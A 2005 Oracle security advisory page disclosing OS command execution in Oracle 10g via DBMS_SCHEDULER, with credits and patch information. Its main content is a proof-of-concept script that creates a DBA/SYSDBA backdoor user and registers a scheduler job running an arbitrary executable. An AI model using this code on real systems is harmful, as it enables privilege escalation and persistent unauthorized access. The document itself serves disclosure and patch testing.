Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
Oracle 10g Exploit dbms_scheduler
Name
OS command execution via Oracle DBMS_SCHEDULER in Oracle 10g
Systems Affected
Oracle 10g
Severity
High Risk
Category
OS command execution
Credit
Pete Finnigan of Pete Finnigan Ltd. in conjunction with Jonathan Gennick of O'Reilly and Alexander Kornbrust of Red-Database-Security GmbH
Date
01 May 2005 (V 1.01)
Details
The following proof of concept exploit code allows any user with CREATE JOB privileges to execute OS commands in the context of the user Oracle.
Example
#!/bin/ksh
set -a
echo "Operator, are you pondering what I am pondering? ">/dev/console
ORAENV_ASK=NO
ORACLE_SID= <sid>
. /usr/local/bin/oraenv
sqlplus "/ as sysdba " < <EOF
create user brain identified by takeover default tablespace system;
grant connect,resource,dba to brain;
grant sysdba to brain;
EOF
BEGIN
DBMS_SCHEDULER.CREATE_PROGRAM (
program_name => 'take_over_the_world ',
program_action => '/tmp/pinky_and_the_brain ',
program_type => 'EXECUTABLE ',
comments => 'I rulez ');
END;
/
Patch Information
This bug is fixed after applying the patchset for Oracle alert 68 or later patchsets.
References
Pete Finnigan's Security Advisotry - Bug in dbms_scheduler
ゥ 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.